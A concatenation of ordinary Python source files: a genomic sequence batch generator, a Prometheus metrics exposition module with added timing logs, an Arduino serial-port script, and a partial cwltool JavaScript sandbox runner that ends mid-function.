control_profile = control_profile.repeat(2, axis=0)
control_profile_counts = control_profile_counts.repeat(2, axis=0)
profile = profile.repeat(2, axis=0)
profile_counts = profile_counts.repeat(2, axis=0)
# list of sequences in the batch, these will be one hot
# encoded together as a single sequence after iterating
# over the batch
sequences = []
# list of chromosome start/end coordinates
# useful for tracking test batches
coordinates = []
# open all the control bigwig files and store the file
# objects in a dictionary
control_files = {}
for task in self._tasks:
# the control track is optional
if 'control' in self._tasks[task]:
control_files[task] = pyBigWig.open(
self._tasks[task]['control'])
# in 'test' mode we pass the true profile as part of the
# returned tuple from the batch generator
if self._mode == "train" or self._mode == "val" or \
self._mode == "test":
# open all the required bigwig files and store the file
# objects in a dictionary
signal_files = {}
for task in self._tasks:
signal_files[task] = pyBigWig.open(self._tasks[task]['signal'])
# iterate over the batch
rowCnt = 0
for _, row in coords.iterrows():
# randomly set a jitter value to move the peak summit
# slightly away from the exact center
jitter = 0
if self._mode == "train" and self._max_jitter:
jitter = random.randint(-self._max_jitter, self._max_jitter)
# Step 1 get the sequence
chrom = row['chrom']
# we use self._input_flank here and not self._output_flank because
# input_seq_len is different from output_len
start = row['pos'] - self._input_flank + jitter
end = row['pos'] + self._input_flank + jitter
seq = fasta_ref[chrom][start:end].seq.upper()
# collect all the sequences into a list
sequences.append(seq)
start = row['pos'] - self._output_flank + jitter
end = row['pos'] + self._output_flank + jitter
# collect all the start/end coordinates into a list
# we'll send this off along with 'test' batches
coordinates.append((chrom, start, end))
# iterate over each task
for task in self._tasks:
# identifies the +/- strand pair
task_id = self._tasks[task]['task_id']
# the strand id: 0-positive, 1-negative
# easy to index with those values
strand = self._tasks[task]['strand']
# Step 2. get the control values
if task in control_files:
control_values = control_files[task].values(
chrom, start, end)
# replace nans with zeros
if np.any(np.isnan(control_values)):
control_values = np.nan_to_num(control_values)
# update row in batch with the control values
# the values are summed across all tasks
# the axis = 1 dimension accumulates the sum
# there are 'n' copies of the sum along axis = 2,
# n = #smoothing_windows
control_profile[rowCnt, :, :] += np.expand_dims(
control_values, axis=1)
# in 'test' mode we pass the true profile as part of the
# returned tuple from the batch generator
if self._mode == "train" or self._mode == "val" or \
self._mode == "test":
# Step 3. get the signal values
# fetch values using the pyBigWig file objects
values = signal_files[task].values(chrom, start, end)
# replace nans with zeros
if np.any(np.isnan(values)):
values = np.nan_to_num(values)
# update row in batch with the signal values
if self._stranded:
profile[rowCnt, :, task_id * 2 + strand] = values
else:
profile[rowCnt, :, task_id] = values
rowCnt += 1
# Step 4. reverse complement augmentation
if self._mode == "train" and self._rev_comp_aug:
# Step 4.1 get list of reverse complement sequences
rev_comp_sequences = \
sequtils.reverse_complement_of_sequences(sequences)
# append the rev comp sequences to the original list
sequences.extend(rev_comp_sequences)
# Step 4.2 reverse complement of the control profile
control_profile[rowCnt:, :, :] = \
sequtils.reverse_complement_of_profiles(
control_profile[:rowCnt, :, :], self._stranded)
# Step 4.3 reverse complement of the signal profile
profile[rowCnt:, :, :] = \
sequtils.reverse_complement_of_profiles(
profile[:rowCnt, :, :], self._stranded)
# Step 5. one hot encode all the sequences in the batch
if len(sequences) == profile.shape[0]:
X = sequtils.one_hot_encode(sequences, self._input_flank * 2)
else:
raise NoTracebackException(
"Unable to generate enough sequences for the batch")
# we can perform smoothing on the entire batch of control values
for i in range(len(self._control_smoothing)):
sigma = self._control_smoothing[i][0]
window_size = self._control_smoothing[i][1]
# it's i+1 because index 0 holds the original,
# unsmoothed control
control_profile[:, :, i + 1] = utils.gaussian1D_smoothing(
control_profile[:, :, i + 1], sigma, window_size)
# log of sum of control profile without smoothing (idx = 0)
control_profile_counts = np.log(
np.sum(control_profile[:, :, 0], axis=-1) + 1)
# in 'train' and 'val' mode we need input and output
# dictionaries
if self._mode == "train" or self._mode == 'val':
# we can now sum the profiles for the entire batch
profile_counts = np.log(np.sum(profile, axis=1) + 1)
# return a tuple of input and output dictionaries
# 'coordinates' and 'status' are not inputs to the model,
# so you will see a warning about unused inputs while
# training. It's safe to ignore the warning
# We pass 'coordinates' so we can track the exact
# coordinates of the inputs (because jitter is random)
# 'status' refers to whether the data sample is a +ve (1)
# or -ve (-1) example and is used by the attribution
# prior loss function
return ({#'coordinates': coordinates,
'status': coords['status'].values,
'sequence': X,
'control_profile': control_profile,
'control_logcount': control_profile_counts},
{'profile_predictions': profile,
'logcount_predictions': profile_counts})
# in 'test' mode return a tuple of coordinates, true profiles
# & the input dictionary
return (coordinates, profile,
{'sequence': X,
'control_profile': control_profile,
'control_logcount': control_profile_counts})
def list_generator_names():
"""
List all available sequence generators that are derived
classes of the base class MSequenceGenerator
Returns:
list: list of sequence generator names
"""
generator_names = []
for c in MSequenceGenerator.__subclasses__():
result = re.search('M(.*)SequenceGenerator', c.__name__)
generator_names.append(result.group(1))
return generator_names
def find_generator_by_name(generator_name):
"""
Get the sequence generator class name given its name
Returns:
str: sequence generator class name
"""
for c in MSequenceGenerator.__subclasses__():
result = re.search('M(.*)SequenceGenerator', c.__name__)
if generator_name == result.group(1):
return c.__name__
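# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the library): shows how the
# configuration dictionaries documented in MSequenceGenerator might be wired
# into MBPNetSequenceGenerator. All file paths, chromosome names and numeric
# values below are placeholders/assumptions, not defaults of this module.
def _example_build_bpnet_generator():  # never called here; for illustration only
    input_config = {
        'data': 'tasks.json',        # placeholder path to the tasks json
        'stranded': True,
        'has_control': True
    }
    batch_gen_params = {
        'input_seq_len': 2114,       # assumed BPNet-style input length
        'output_len': 1000,          # assumed output profile length
        'max_jitter': 128,
        'rev_comp_aug': True,
        'negative_sampling_rate': 0.1,
        'sampling_mode': 'peaks',
        'shuffle': True,
        'mode': 'train'
    }
    gen = MBPNetSequenceGenerator(
        input_config, batch_gen_params,
        reference_genome='hg38.fa',              # placeholder fasta
        chrom_sizes='hg38.chrom.sizes',          # placeholder sizes file
        chroms=['chr1', 'chr2'],
        num_threads=4, epochs=10, batch_size=64,
        control_smoothing=[[7.0, 81]])           # assumed [sigma, window_size]
    # in 'train' mode each yielded batch is a (inputs_dict, outputs_dict) tuple
    for batch in gen.gen(epoch=0):
        inputs, outputs = batch
        break
    return inputs, outputs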
|
exposition.py
|
import base64
from contextlib import closing
from http.server import BaseHTTPRequestHandler
import os
import socket
from socketserver import ThreadingMixIn
import sys
import threading
import logging
from urllib.error import HTTPError
from urllib.parse import parse_qs, quote_plus, urlparse
from urllib.request import (
build_opener, HTTPHandler, HTTPRedirectHandler, Request,
)
from wsgiref.simple_server import make_server, WSGIRequestHandler, WSGIServer
from datetime import datetime
from .openmetrics import exposition as openmetrics
from .registry import REGISTRY
from .utils import floatToGoString
logger = logging.getLogger(__name__)
CONTENT_TYPE_LATEST = 'text/plain; version=0.0.4; charset=utf-8'
"""Content type of the latest text format"""
PYTHON376_OR_NEWER = sys.version_info > (3, 7, 5)
class _PrometheusRedirectHandler(HTTPRedirectHandler):
"""
Allow additional methods (e.g. PUT) and data forwarding in redirects.
Use of this class constitutes a user's explicit agreement to the
redirect responses the Prometheus client will receive when using it.
You should only use this class if you control or otherwise trust the
redirect behavior involved and are certain it is safe to fully transfer
the original request (method and data) to the redirected URL. For
example, if you know there is a cosmetic URL redirect in front of a
local deployment of a Prometheus server, and all redirects are safe,
this is the class to use to handle redirects in that case.
The standard HTTPRedirectHandler does not forward request data nor
does it allow redirected PUT requests (which Prometheus uses for some
operations, for example `push_to_gateway`) because these cannot
generically satisfy the HTTP RFC 2616 requirement that the user
explicitly confirm redirects that could have unexpected side effects
(such as rendering a PUT request non-idempotent or creating multiple
resources not named in the original request).
"""
def redirect_request(self, req, fp, code, msg, headers, newurl):
"""
Apply redirect logic to a request.
See parent HTTPRedirectHandler.redirect_request for parameter info.
If the redirect is disallowed, this raises the corresponding HTTP error.
If the redirect can't be determined, return None to allow other handlers
to try. If the redirect is allowed, return the new request.
This method is specialized for the case where (a) the user knows that the
redirect will not cause unacceptable side effects for any request method,
and (b) the user knows that any request data should be passed through to
the redirect. If either condition is not met, this should not be used.
"""
# note that requests being provided by a handler will use get_method to
# indicate the method, by monkeypatching this, instead of setting the
# Request object's method attribute.
m = getattr(req, "method", req.get_method())
if not (code in (301, 302, 303, 307) and m in ("GET", "HEAD")
or code in (301, 302, 303) and m in ("POST", "PUT")):
raise HTTPError(req.full_url, code, msg, headers, fp)
new_request = Request(
newurl.replace(' ', '%20'), # space escaping in new url if needed.
headers=req.headers,
origin_req_host=req.origin_req_host,
unverifiable=True,
data=req.data,
)
new_request.method = m
return new_request
def _bake_output(registry, accept_header, params):
"""Bake output for metrics output."""
logger.warning("{} start choose encoder".format(get_time()))
encoder, content_type = choose_encoder(accept_header)
logger.warning("{} choose encoder done".format(get_time()))
if 'name[]' in params:
registry = registry.restricted_registry(params['name[]'])
logger.warning("{} start encoder".format(get_time()))
output = encoder(registry)
logger.warning("{} encoder done".format(get_time()))
return '200 OK', ('Content-Type', content_type), output
def make_wsgi_app(registry=REGISTRY):
"""Create a WSGI app which serves the metrics from a registry."""
def prometheus_app(environ, start_response):
# Prepare parameters
logger.warning("{} get request".format(get_time()))
accept_header = environ.get('HTTP_ACCEPT')
params = parse_qs(environ.get('QUERY_STRING', ''))
if environ['PATH_INFO'] == '/favicon.ico':
# Serve empty response for browsers
status = '200 OK'
header = ('', '')
output = b''
else:
# Bake output
logger.warning("{} ready to bake output".format(get_time()))
status, header, output = _bake_output(registry, accept_header, params)
logger.warning("{} bake output done".format(get_time()))
# Return output
logger.warning("{} start response".format(get_time()))
start_response(status, [header])
logger.warning("{} response done".format(get_time()))
return [output]
return prometheus_app
def get_time():
return datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')
class _SilentHandler(WSGIRequestHandler):
"""WSGI handler that does not log requests."""
def log_message(self, format, *args):
"""Log nothing."""
logger.warning("{} {}:{} {} {} {}".format(get_time(),*self.client_address,*args))
class ThreadingWSGIServer(ThreadingMixIn, WSGIServer):
"""Thread per request HTTP server."""
# Make worker threads "fire and forget". Beginning with Python 3.7 this
# prevents a memory leak because ``ThreadingMixIn`` starts to gather all
# non-daemon threads in a list in order to join on them at server close.
daemon_threads = True
def start_wsgi_server(port, addr='', registry=REGISTRY):
"""Starts a WSGI server for prometheus metrics as a daemon thread."""
app = make_wsgi_app(registry)
httpd = make_server(addr, port, app, ThreadingWSGIServer, handler_class=_SilentHandler)
t = threading.Thread(target=httpd.serve_forever)
t.daemon = True
t.start()
start_http_server = start_wsgi_server
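# Illustrative usage sketch (not part of this module): assuming the package is
# installed as prometheus_client, the WSGI exposition above is typically used
# like this. 'Counter' comes from the package's metrics module, not this file;
# the port and metric names are placeholders.
def _example_serve_metrics():  # never called here; for illustration only
    from prometheus_client import Counter
    requests_total = Counter('example_requests_total', 'Example request count')
    start_http_server(8000)   # serves /metrics on port 8000 in a daemon thread
    requests_total.inc()      # metric shows up on the next scrape of /metrics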
def generate_latest(registry=REGISTRY):
"""Returns the metrics from the registry in latest text format as a string."""
def sample_line(line):
if line.labels:
labelstr = '{{{0}}}'.format(','.join(
['{}="{}"'.format(
k, v.replace('\\', r'\\').replace('\n', r'\n').replace('"', r'\"'))
for k, v in sorted(line.labels.items())]))
else:
labelstr = ''
timestamp = ''
if line.timestamp is not None:
# Convert to milliseconds.
timestamp = f' {int(float(line.timestamp) * 1000):d}'
return f'{line.name}{labelstr} {floatToGoString(line.value)}{timestamp}\n'
output = []
for metric in registry.collect():
try:
mname = metric.name
mtype = metric.type
# Munging from OpenMetrics into Prometheus format.
if mtype == 'counter':
mname = mname + '_total'
elif mtype == 'info':
mname = mname + '_info'
mtype = 'gauge'
elif mtype == 'stateset':
mtype = 'gauge'
elif mtype == 'gaugehistogram':
# A gauge histogram is really a gauge,
# but this captures the structure better.
mtype = 'histogram'
elif mtype == 'unknown':
mtype = 'untyped'
output.append('# HELP {} {}\n'.format(
mname, metric.documentation.replace('\\', r'\\').replace('\n', r'\n')))
output.append(f'# TYPE {mname} {mtype}\n')
om_samples = {}
for s in metric.samples:
for suffix in ['_created', '_gsum', '_gcount']:
if s.name == metric.name + suffix:
# OpenMetrics specific sample, put in a gauge at the end.
om_samples.setdefault(suffix, []).append(sample_line(s))
break
else:
output.append(sample_line(s))
except Exception as exception:
exception.args = (exception.args or ('',)) + (metric,)
raise
for suffix, lines in sorted(om_samples.items()):
output.append('# HELP {}{} {}\n'.format(metric.name, suffix,
metric.documentation.replace('\\', r'\\').replace('\n', r'\n')))
output.append(f'# TYPE {metric.name}{suffix} gauge\n')
output.extend(lines)
return ''.join(output).encode('utf-8')
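# Example of the text exposition produced above (illustrative): a counter
# registered as Counter('requests', 'Total requests.', ['method']) with one
# observed label value renders as
#
#     # HELP requests_total Total requests.
#     # TYPE requests_total counter
#     requests_total{method="get"} 7.0
#
# (depending on the client version, a trailing requests_created gauge block may
# follow for the OpenMetrics _created sample, as handled by om_samples above).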
def choose_encoder(accept_header):
accept_header = accept_header or ''
for accepted in accept_header.split(','):
if accepted.split(';')[0].strip() == 'application/openmetrics-text':
return (openmetrics.generate_latest,
openmetrics.CONTENT_TYPE_LATEST)
return generate_latest, CONTENT_TYPE_LATEST
class MetricsHandler(BaseHTTPRequestHandler):
"""HTTP handler that gives metrics from ``REGISTRY``."""
registry = REGISTRY
def do_GET(self):
# Prepare parameters
registry = self.registry
accept_header = self.headers.get('Accept')
params = parse_qs(urlparse(self.path).query)
# Bake output
status, header, output = _bake_output(registry, accept_header, params)
# Return output
self.send_response(int(status.split(' ')[0]))
self.send_header(*header)
self.end_headers()
self.wfile.write(output)
def log_message(self, format, *args):
"""Log nothing."""
@classmethod
def factory(cls, registry):
"""Returns a dynamic MetricsHandler class tied
to the passed registry.
"""
# This implementation relies on MetricsHandler.registry
# (defined above and defaulted to REGISTRY).
# As we have unicode_literals, we need to create a str()
# object for type().
cls_name = str(cls.__name__)
MyMetricsHandler = type(cls_name, (cls, object),
{"registry": registry})
return MyMetricsHandler
def write_to_textfile(path, registry):
"""Write metrics to the given path.
This is intended for use with the Node exporter textfile collector.
The path must end in .prom for the textfile collector to process it."""
tmppath = f'{path}.{os.getpid()}.{threading.current_thread().ident}'
with open(tmppath, 'wb') as f:
f.write(generate_latest(registry))
# rename(2) is atomic but fails on Windows if the destination file exists
if os.name == 'nt':
os.replace(tmppath, path)
else:
os.rename(tmppath, path)
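# Usage sketch (not part of this module): writing a dedicated registry to a
# .prom file for the node_exporter textfile collector. The output path is
# hypothetical and must live inside the collector's textfile directory.
#
#     from prometheus_client import CollectorRegistry, Gauge, write_to_textfile
#
#     registry = CollectorRegistry()
#     g = Gauge('batch_job_last_success_unixtime',
#               'Unix time the batch job last finished successfully',
#               registry=registry)
#     g.set_to_current_time()
#     write_to_textfile('/var/lib/node_exporter/textfile/batch_job.prom', registry)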
def _make_handler(url, method, timeout, headers, data, base_handler):
def handle():
request = Request(url, data=data)
request.get_method = lambda: method
for k, v in headers:
request.add_header(k, v)
resp = build_opener(base_handler).open(request, timeout=timeout)
if resp.code >= 400:
raise OSError(f"error talking to pushgateway: {resp.code} {resp.msg}")
return handle
def default_handler(url, method, timeout, headers, data):
"""Default handler that implements HTTP/HTTPS connections.
Used by the push_to_gateway functions. Can be re-used by other handlers."""
return _make_handler(url, method, timeout, headers, data, HTTPHandler)
def passthrough_redirect_handler(url, method, timeout, headers, data):
"""
Handler that automatically trusts redirect responses for all HTTP methods.
Augments standard HTTPRedirectHandler capability by permitting PUT requests,
preserving the method upon redirect, and passing through all headers and
data from the original request. Only use this handler if you control or
trust the source of redirect responses you encounter when making requests
via the Prometheus client. This handler will simply repeat the identical
request, including same method and data, to the new redirect URL."""
return _make_handler(url, method, timeout, headers, data, _PrometheusRedirectHandler)
def basic_auth_handler(url, method, timeout, headers, data, username=None, password=None):
"""Handler that implements HTTP/HTTPS connections with Basic Auth.
Sets auth headers using supplied 'username' and 'password', if set.
Used by the push_to_gateway functions. Can be re-used by other handlers."""
def handle():
"""Handler that implements HTTP Basic Auth.
"""
if username is not None and password is not None:
auth_value = f'{username}:{password}'.encode()
auth_token = base64.b64encode(auth_value)
auth_header = b'Basic ' + auth_token
headers.append(['Authorization', auth_header])
default_handler(url, method, timeout, headers, data)()
return handle
def push_to_gateway(
gateway, job, registry, grouping_key=None, timeout=30,
handler=default_handler):
"""Push metrics to the given pushgateway.
`gateway` the url for your push gateway. Either of the form
'http://pushgateway.local', or 'pushgateway.local'.
Scheme defaults to 'http' if none is provided
`job` is the job label to be attached to all pushed metrics
`registry` is an instance of CollectorRegistry
`grouping_key` please see the pushgateway documentation for details.
Defaults to None
`timeout` is how long push will attempt to connect before giving up.
Defaults to 30s, can be set to None for no timeout.
`handler` is an optional function which can be provided to perform
requests to the 'gateway'.
Defaults to None, in which case an http or https request
will be carried out by a default handler.
If not None, the argument must be a function which accepts
the following arguments:
url, method, timeout, headers, and content
May be used to implement additional functionality not
supported by the built-in default handler (such as SSL
client certicates, and HTTP authentication mechanisms).
'url' is the URL for the request, the 'gateway' argument
described earlier will form the basis of this URL.
'method' is the HTTP method which should be used when
carrying out the request.
'timeout' requests not successfully completed after this
many seconds should be aborted. If timeout is None, then
the handler should not set a timeout.
'headers' is a list of ("header-name","header-value") tuples
which must be passed to the pushgateway in the form of HTTP
request headers.
The function should raise an exception (e.g. IOError) on
failure.
'content' is the data which should be used to form the HTTP
Message Body.
This overwrites all metrics with the same job and grouping_key.
This uses the PUT HTTP method."""
_use_gateway('PUT', gateway, job, registry, grouping_key, timeout, handler)
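# Sketch of a custom handler for push_to_gateway (an illustration, not shipped
# with the library): it takes the same arguments as default_handler above and
# must return a zero-argument callable that performs the request and raises on
# failure. Here it simply logs before delegating to the default handler; the
# gateway address and registry are assumed to exist.
#
#     def logging_handler(url, method, timeout, headers, data):
#         def handle():
#             print('pushing %d bytes to %s via %s' % (len(data), url, method))
#             default_handler(url, method, timeout, headers, data)()
#         return handle
#
#     push_to_gateway('pushgateway.local', job='batch', registry=registry,
#                     handler=logging_handler)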
def pushadd_to_gateway(
gateway, job, registry, grouping_key=None, timeout=30,
handler=default_handler):
"""PushAdd metrics to the given pushgateway.
`gateway` the url for your push gateway. Either of the form
'http://pushgateway.local', or 'pushgateway.local'.
Scheme defaults to 'http' if none is provided
`job` is the job label to be attached to all pushed metrics
`registry` is an instance of CollectorRegistry
`grouping_key` please see the pushgateway documentation for details.
Defaults to None
`timeout` is how long push will attempt to connect before giving up.
Defaults to 30s, can be set to None for no timeout.
`handler` is an optional function which can be provided to perform
requests to the 'gateway'.
Defaults to None, in which case an http or https request
will be carried out by a default handler.
See the 'prometheus_client.push_to_gateway' documentation
for implementation requirements.
This replaces metrics with the same name, job and grouping_key.
This uses the POST HTTP method."""
_use_gateway('POST', gateway, job, registry, grouping_key, timeout, handler)
def delete_from_gateway(
gateway, job, grouping_key=None, timeout=30, handler=default_handler):
"""Delete metrics from the given pushgateway.
`gateway` the url for your push gateway. Either of the form
'http://pushgateway.local', or 'pushgateway.local'.
Scheme defaults to 'http' if none is provided
`job` is the job label to be attached to all pushed metrics
`grouping_key` please see the pushgateway documentation for details.
Defaults to None
`timeout` is how long delete will attempt to connect before giving up.
Defaults to 30s, can be set to None for no timeout.
`handler` is an optional function which can be provided to perform
requests to the 'gateway'.
Defaults to None, in which case an http or https request
will be carried out by a default handler.
See the 'prometheus_client.push_to_gateway' documentation
for implementation requirements.
This deletes metrics with the given job and grouping_key.
This uses the DELETE HTTP method."""
_use_gateway('DELETE', gateway, job, None, grouping_key, timeout, handler)
def _use_gateway(method, gateway, job, registry, grouping_key, timeout, handler):
gateway_url = urlparse(gateway)
# See https://bugs.python.org/issue27657 for details on urlparse in py>=3.7.6.
if not gateway_url.scheme or (
PYTHON376_OR_NEWER
and gateway_url.scheme not in ['http', 'https']
):
gateway = f'http://{gateway}'
gateway = gateway.rstrip('/')
url = '{}/metrics/{}/{}'.format(gateway, *_escape_grouping_key("job", job))
data = b''
if method != 'DELETE':
data = generate_latest(registry)
if grouping_key is None:
grouping_key = {}
url += ''.join(
'/{}/{}'.format(*_escape_grouping_key(str(k), str(v)))
for k, v in sorted(grouping_key.items()))
handler(
url=url, method=method, timeout=timeout,
headers=[('Content-Type', CONTENT_TYPE_LATEST)], data=data,
)()
def _escape_grouping_key(k, v):
if v == "":
# Per https://github.com/prometheus/pushgateway/pull/346.
return k + "@base64", "="
elif '/' in v:
# Added in Pushgateway 0.9.0.
return k + "@base64", base64.urlsafe_b64encode(v.encode("utf-8")).decode("utf-8")
else:
return k, quote_plus(v)
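# Worked examples of the escaping rules above (illustrative):
#
#     _escape_grouping_key("instance", "web-1")  ->  ("instance", "web-1")
#     _escape_grouping_key("path", "/var/tmp")   ->  ("path@base64", "L3Zhci90bXA=")
#     _escape_grouping_key("empty", "")          ->  ("empty@base64", "=")
#
# so a grouping key of {"path": "/var/tmp"} is appended to the push URL as
# ".../path@base64/L3Zhci90bXA=".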
def instance_ip_grouping_key():
"""Grouping key with instance set to the IP Address of this host."""
with closing(socket.socket(socket.AF_INET, socket.SOCK_DGRAM)) as s:
if sys.platform == 'darwin':
# This check is done this way only on MacOS devices
# it is done this way because the localhost method does
# not work.
# This method was adapted from this StackOverflow answer:
# https://stackoverflow.com/a/28950776
s.connect(('10.255.255.255', 1))
else:
s.connect(('localhost', 0))
return {'instance': s.getsockname()[0]}
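# Usage sketch combining the helpers above (not part of this module): push a
# registry to a Pushgateway grouped by this host's IP address. The gateway
# address is hypothetical; port 9091 is the Pushgateway default.
#
#     from prometheus_client import CollectorRegistry, Counter
#
#     registry = CollectorRegistry()
#     Counter('batch_runs', 'Batch runs', registry=registry).inc()
#     push_to_gateway('pushgateway.local:9091', job='batch_demo',
#                     registry=registry, grouping_key=instance_ip_grouping_key())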
from .asgi import make_asgi_app # noqa
|
arduinoePython.py
|
import serial
import threading
import time
conectado = False
porta = 'COM3'  # on Linux or macOS this is usually something like '/dev/ttyS0'
velocidadeBaud = 115200
mensagensRecebidas = 1
desligarArduinoThread = False
try:
    SerialArduino = serial.Serial(porta, velocidadeBaud, timeout=0.2)
except Exception:
    print("Check the serial port or reconnect the Arduino")
    raise SystemExit(1)
def handle_data(data):
    global mensagensRecebidas
    print("Received " + str(mensagensRecebidas) + ": " + data)
    mensagensRecebidas += 1
def read_from_port(ser):
    global conectado, desligarArduinoThread
    # flag the connection as established on first entry
    while not conectado:
        conectado = True
    while True:
        # readline() returns an empty string after the 0.2 s timeout,
        # so the shutdown flag below is re-checked at least every 0.2 s
        reading = ser.readline().decode()
        if reading != "":
            handle_data(reading)
        if desligarArduinoThread:
            print("Shutting down Arduino")
            break
lerSerialThread = threading.Thread(target=read_from_port, args=(SerialArduino,))
lerSerialThread.start()
print("Preparando Arduino")
time.sleep(2)
print("Arduino Pronto")
while (True):
try:
print("Enviando")
SerialArduino.write('ligar luzes\n'.encode())
time.sleep(2)
except KeyboardInterrupt:
print("Apertou Ctrl+C")
desligarArduinoThread = True
SerialArduino.close()
lerSerialThread.join()
break
|
sandboxjs.py
|
from __future__ import absolute_import
import errno
import json
import logging
import os
import re
import select
import sys
import threading
from io import BytesIO
from typing import Any, Dict, List, Mapping, Text, Tuple, Union
import six
from pkg_resources import resource_stream
from .utils import json_dumps, onWindows, subprocess, processes_to_kill
try:
import queue # type: ignore
except ImportError:
import Queue as queue # type: ignore
class JavascriptException(Exception):
pass
_logger = logging.getLogger("cwltool")
JSON = Union[Dict[Text, Any], List[Any], Text, int, float, bool, None]
localdata = threading.local()
have_node_slim = False
# minimum acceptable version of nodejs engine
minimum_node_version_str = '0.10.26'
def check_js_threshold_version(working_alias):
    # type: (str) -> bool
    """Check whether the nodeJS engine version on the system meets the
    minimum allowed version.
    https://github.com/nodejs/node/blob/master/CHANGELOG.md#nodejs-changelog
    """
# parse nodejs version into int Tuple: 'v4.2.6\n' -> [4, 2, 6]
current_version_str = subprocess.check_output(
[working_alias, "-v"]).decode('utf-8')
current_version = [int(v) for v in current_version_str.strip().strip('v').split('.')]
minimum_node_version = [int(v) for v in minimum_node_version_str.split('.')]
if current_version >= minimum_node_version:
return True
else:
return False
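# Example of the comparison performed above (illustrative only):
#
#     >>> [int(v) for v in 'v4.2.6\n'.strip().strip('v').split('.')]
#     [4, 2, 6]
#     >>> [4, 2, 6] >= [0, 10, 26]
#     True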
def new_js_proc(js_text, force_docker_pull=False):
# type: (Text, bool) -> subprocess.Popen
required_node_version, docker = (False,)*2
nodejs = None
trynodes = ("nodejs", "node")
for n in trynodes:
try:
if subprocess.check_output([n, "--eval", "process.stdout.write('t')"]).decode('utf-8') != "t":
continue
else:
nodejs = subprocess.Popen([n, "--eval", js_text],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
processes_to_kill.append(nodejs)
required_node_version = check_js_threshold_version(n)
break
except (subprocess.CalledProcessError, OSError):
pass
    if nodejs is None or (nodejs is not None and required_node_version is False):
try:
nodeimg = "node:slim"
global have_node_slim
if not have_node_slim:
dockerimgs = subprocess.check_output(["docker", "images", "-q", nodeimg]).decode('utf-8')
# if output is an empty string
if (len(dockerimgs.split("\n")) <= 1) or force_docker_pull:
# pull node:slim docker container
nodejsimg = subprocess.check_output(["docker", "pull", nodeimg]).decode('utf-8')
_logger.info("Pulled Docker image %s %s", nodeimg, nodejsimg)
have_node_slim = True
nodejs = subprocess.Popen(["docker", "run",
"--attach=STDIN", "--attach=STDOUT", "--attach=STDERR",
"--sig-proxy=true", "--interactive",
"--rm", nodeimg, "node", "--eval", js_text],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
processes_to_kill.append(nodejs)
docker = True
except OSError as e:
if e.errno == errno.ENOENT:
pass
else:
raise
except subprocess.CalledProcessError:
pass
# docker failed and nodejs not on system
if nodejs is None:
raise JavascriptException(
u"cwltool requires Node.js engine to evaluate and validate "
u"Javascript expressions, but couldn't find it. Tried %s, "
u"docker run node:slim" % u", ".join(trynodes))
    # docker failed, but nodejs is installed on the system and its version is below the required minimum
if docker is False and required_node_version is False:
raise JavascriptException(
u'cwltool requires minimum v{} version of Node.js engine.'.format(minimum_node_version_str),
u'Try updating: https://docs.npmjs.com/getting-started/installing-node')
return nodejs
def exec_js_process(js_text, # type: Text
timeout=None, # type: float
js_console=False, # type: bool
context=None, # type: Text
force_docker_pull=False, # type: bool
debug=False # type: bool
):
# type: (...) -> Tuple[int, Text, Text]
if not hasattr(localdata, "procs"):
localdata.procs = {}
if js_console and context is not None:
raise NotImplementedError("js_console=True and context not implemented")
if js_console:
js_engine = 'cwlNodeEngineJSConsole.js'
_logger.warn("Running with support for javascript console in expressions (DO NOT USE IN PRODUCTION)")
elif context is not None:
js_engine = "cwlNodeEngineWithContext.js"
else:
js_engine = 'cwlNodeEngine.js'
created_new_process = False
if context is None:
nodejs = localdata.procs.get(js_engine)
else:
nodejs = localdata.procs.get((js_engine, context))
if nodejs is None \
or nodejs.poll() is not None \
or onWindows():
res = resource_stream(__name__, js_engine)
js_engine_code = res.read().decode('utf-8')
created_new_process = True
new_proc = new_js_proc(js_engine_code, force_docker_pull=force_docker_pull)
if context is None:
localdata.procs[js_engine] = new_proc
nodejs = new_proc
else:
localdata.procs[(js_engine, context)] = new_proc
nodejs = new_proc
killed = []
""" Kill the node process if it exceeds timeout limit"""
def terminate():
try:
killed.append(True)
nodejs.kill()
except OSError:
pass
if timeout is None:
timeout = 20
tm = threading.Timer(timeout, terminate)
tm.daemon = True
tm.start()
stdin_text = u""
if created_new_process and context is not None:
stdin_text = json_dumps(context) + "\n"
stdin_text += json_dumps(js_text) + "\n"
stdin_buf = BytesIO(stdin_text.encode('utf-8'))
stdout_buf = BytesIO()
stderr_buf = BytesIO()
rselect = [nodejs.stdout, nodejs.stderr] # type: List[BytesIO]
wselect = [nodejs.stdin] # type: List[BytesIO]
PROCESS_FINISHED_STR = "r1cepzbhUTxtykz5XTC4\n"
def process_finished(): # type: () -> bool
return stdout_buf.getvalue().decode('utf-8').endswith(PROCESS_FINISHED_STR) and \
stderr_buf.getvalue().decode('utf-8').endswith(PROCESS_FINISHED_STR)
# On windows system standard input/output are not handled properly by select module
# (modules like pywin32, msvcrt, gevent don't work either)
if sys.platform=='win32':
READ_BYTES_SIZE = 512
        # queues used to shuttle stdin/stdout/stderr data between helper threads and this one
input_queue = queue.Queue()
output_queue = queue.Queue()
error_queue = queue.Queue()
# To tell threads that output has ended and threads can safely exit
no_more_output = threading.Lock()
no_more_output.acquire()
no_more_error = threading.Lock()
no_more_error.acquire()
# put constructed command to input queue which then will be passed to nodejs's stdin
def put_input(input_queue):
while True:
b = stdin_buf.read(READ_BYTES_SIZE)
if b:
input_queue.put(b)
else:
break
        # get the output from nodejs's stdout and continue till output ends
def get_output(output_queue):
while not no_more_output.acquire(False):
b=os.read(nodejs.stdout.fileno(), READ_BYTES_SIZE)
if b:
output_queue.put(b)
# get the output from nodejs's stderr and continue till error output ends
def get_error(error_queue):
while not no_more_error.acquire(False):
b = os.read(nodejs.stderr.fileno(), READ_BYTES_SIZE)
if b:
error_queue.put(b)
# Threads managing nodejs.stdin, nodejs.stdout and nodejs.stderr respectively
input_thread = threading.Thread(target=put_input, args=(input_queue,))
input_thread.daemon=True
input_thread.start()
output_thread = threading.Thread(target=get_output, args=(output_queue,))
output_thread.daemon=True
output_thread.start()
error_thread = threading.Thread(target=get_error, args=(error_queue,))
error_thread.daemon=True
error_thread.start()
finished = False
while not finished and tm.is_alive():
try:
if nodejs.stdin in wselect:
if not input_queue.empty():
os.write(nodejs.stdin.fileno(), input_queue.get())
elif not input_thread.is_alive():
wselect = []
if nodejs.stdout in rselect:
if not output_queue.empty():
stdout_buf.write(output_queue.get())
if nodejs.stderr in rselect:
if not error_queue.empty():
